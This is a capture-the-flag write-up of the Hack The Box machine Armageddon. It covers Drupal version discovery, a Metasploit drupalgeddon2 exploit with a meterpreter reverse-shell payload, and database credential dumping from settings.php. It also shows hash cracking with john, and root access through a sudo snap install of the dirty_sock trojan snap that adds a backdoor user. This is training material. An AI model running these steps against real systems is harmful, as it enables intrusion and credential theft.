Hackthebox - Armageddon

Summary

Armageddon was a easy linux machine by bertolis on HTB. Initial foothold was finding a drupal instance. and enumerating this more we find the version which has a unauthenticated RCE using which we get a shell. Privilege Escalation was exploiting sudo snap with gtfobins to get root.

Initial Enumeration

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Nmap 7.91 scan initiated Sun Mar 28 08:57:58 2021 as: nmap -sC -sV -oN nmap/armageddon 10.10.10.233
Nmap scan report for 10.10.10.233
Host is up (0.082s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 28 08:58:11 2021 -- 1 IP address (1 host up) scanned in 13.19 seconds

Let start with port 80

Seeing a create user I tried to create a user

but we get an error as

In robots.txt I saw there is an entry for CHANGELOG.txt

1
2
3
4
5
6
$ curl -s http://10.10.10.233/CHANGELOG.txt

Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.
...[snip]...

We now know the version of the application

Googling for Exploit Drupal 7.56 I saw many RCE CVE

We also see we have metasploit POC too.

Using CVE-2019-6339 we get a RCE and we get a shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.233 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic (PHP In-Memory)

Escalation (apache -> brucetherealadmin)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ cat /var/www/html/sites/default/settings.php
...[snip]...
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
...[snip]...
1
2
3
4
$ mysqldump -u drupaluser -pCQHEy@9M*m23gBVj drupal  > dump_table.sql
# To dump only Users table
$ mysqldump -u drupaluser -pCQHEy@9M*m23gBVj drupal users > users.sql

In the user dump we find password hash for brucetherealadmin as

1
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt

we can try to crack that using john

1
2
3
4
5
6
7
8
9
10
$john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo (?)
1g 0:00:00:01 DONE (2021-03-28 10:50) 0.6711g/s 155.7p/s 155.7c/s 155.7C/s tiffany..harley
Use the "--show" option to display all of the cracked passwords reliably
Session completed

and we crack the password as booboo

Escalation (brucetherealadmin -> root)

Using the above Credentials we get user as

running sudo -l revel

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *
```

we can run `snap install` without password


So I used the trojan_snap from [dirty-sock](https://raw.githubusercontent.com/initstring/dirty_sock/master/dirty_sockv2.py)

copied to the machine and base64 decoded and saved as `trojan.snap`

and ran

```bash
$ sudo snap install --devmode ./trojan.snap

which created a new user with

1
2
username: dirty_sock
password: dirty_sock

using that we get root.

Note: We can create our own trojan package using snapcraft as shown in blog

Credentials

Username Password Source
brucetherealadmin booboo From DB Dump Hash
Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/armageddon/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.